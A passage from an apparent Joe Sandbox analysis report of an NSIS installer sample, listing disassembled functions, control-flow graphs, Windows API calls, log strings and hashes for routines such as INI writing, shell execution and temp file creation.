                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: PrivateProfileStringWritelstrcpyn
                                    • String ID: <RM>$ConservationNtNat$WriteINIStr: wrote [%s] %s=%s in %s
                                    • API String ID: 247603264-2515759225
                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                    APIs
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    Strings
                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                    • API String ID: 3156913733-2180253247
                                    • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                    • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                    Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CountFileNameTempTick
                                    • String ID: nsa
                                    • API String ID: 1716503409-2209301699
                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                    Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 758 4078c5-4078cb 759 4078d0-4078eb 758->759 760 4078cd-4078cf 758->760 761 407aeb-407aff 759->761 762 407bad-407bba 759->762 760->759 764 407b01-407b17 761->764 765 407b19-407b2c 761->765 763 407be7-407beb 762->763 766 407c4a-407c5d 763->766 767 407bed-407c0c 763->767 768 407b33-407b3a 764->768 765->768 771 407c65-407c68 766->771 772 407c25-407c39 767->772 773 407c0e-407c23 767->773 769 407b61-407b64 768->769 770 407b3c-407b40 768->770 769->771 774 407b46-407b5e 770->774 775 407ccd-407cd4 770->775 779 407350 771->779 780 407cec 771->780 776 407c3c-407c43 772->776 773->776 774->769 778 407cdd-407cea 775->778 781 407be1-407be4 776->781 782 407c45 776->782 783 407cef-407cf6 778->783 784 407357-40735b 779->784 785 40749b-4074b6 779->785 786 40746d-407471 779->786 787 4073ff-407403 779->787 780->783 781->763 789 407cd6 782->789 790 407bc6-407bde 782->790 784->778 792 407361-40736e 784->792 785->761 793 407c76-407c7d 786->793 794 407477-40748b 786->794 795 407409-407420 787->795 796 407c6d-407c74 787->796 789->778 790->781 792->780 797 407374-4073ba 792->797 793->778 798 40748e-407496 794->798 799 407423-407427 795->799 796->778 801 4073e2-4073e4 797->801 802 4073bc-4073c0 797->802 798->786 803 407498 798->803 799->787 800 407429-40742f 799->800 804 407431-407438 800->804 805 407459-40746b 800->805 808 4073f5-4073fd 801->808 809 4073e6-4073f3 801->809 806 4073c2-4073c5 GlobalFree 802->806 807 4073cb-4073d9 GlobalAlloc 802->807 803->785 810 407443-407453 GlobalAlloc 804->810 811 40743a-40743d GlobalFree 804->811 805->798 806->807 807->780 812 4073df 807->812 808->799 809->808 809->809 810->780 810->805 811->810 812->801
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                    Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 813 407ac3-407ac7 814 407ac9-407bba 813->814 815 407ade-407ae4 813->815 825 407be7-407beb 814->825 817 407aeb-407aff 815->817 818 407b01-407b17 817->818 819 407b19-407b2c 817->819 822 407b33-407b3a 818->822 819->822 823 407b61-407b64 822->823 824 407b3c-407b40 822->824 828 407c65-407c68 823->828 826 407b46-407b5e 824->826 827 407ccd-407cd4 824->827 829 407c4a-407c5d 825->829 830 407bed-407c0c 825->830 826->823 831 407cdd-407cea 827->831 837 407350 828->837 838 407cec 828->838 829->828 833 407c25-407c39 830->833 834 407c0e-407c23 830->834 836 407cef-407cf6 831->836 835 407c3c-407c43 833->835 834->835 844 407be1-407be4 835->844 845 407c45 835->845 839 407357-40735b 837->839 840 40749b-4074b6 837->840 841 40746d-407471 837->841 842 4073ff-407403 837->842 838->836 839->831 846 407361-40736e 839->846 840->817 847 407c76-407c7d 841->847 848 407477-40748b 841->848 850 407409-407420 842->850 851 407c6d-407c74 842->851 844->825 852 407cd6 845->852 853 407bc6-407bde 845->853 846->838 854 407374-4073ba 846->854 847->831 855 40748e-407496 848->855 856 407423-407427 850->856 851->831 852->831 853->844 858 4073e2-4073e4 854->858 859 4073bc-4073c0 854->859 855->841 860 407498 855->860 856->842 857 407429-40742f 856->857 861 407431-407438 857->861 862 407459-40746b 857->862 865 4073f5-4073fd 858->865 866 4073e6-4073f3 858->866 863 4073c2-4073c5 GlobalFree 859->863 864 4073cb-4073d9 GlobalAlloc 859->864 860->840 867 407443-407453 GlobalAlloc 861->867 868 40743a-40743d GlobalFree 861->868 862->855 863->864 864->838 869 4073df 864->869 865->856 866->865 866->866 867->838 867->862 868->867 869->858
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                    Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                    Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                    Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                    Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                    Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Global$AllocFree
                                    • String ID:
                                    • API String ID: 3394109436-0
                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                    Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: File$AttributesCreate
                                    • String ID:
                                    • API String ID: 415043291-0
                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                    Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
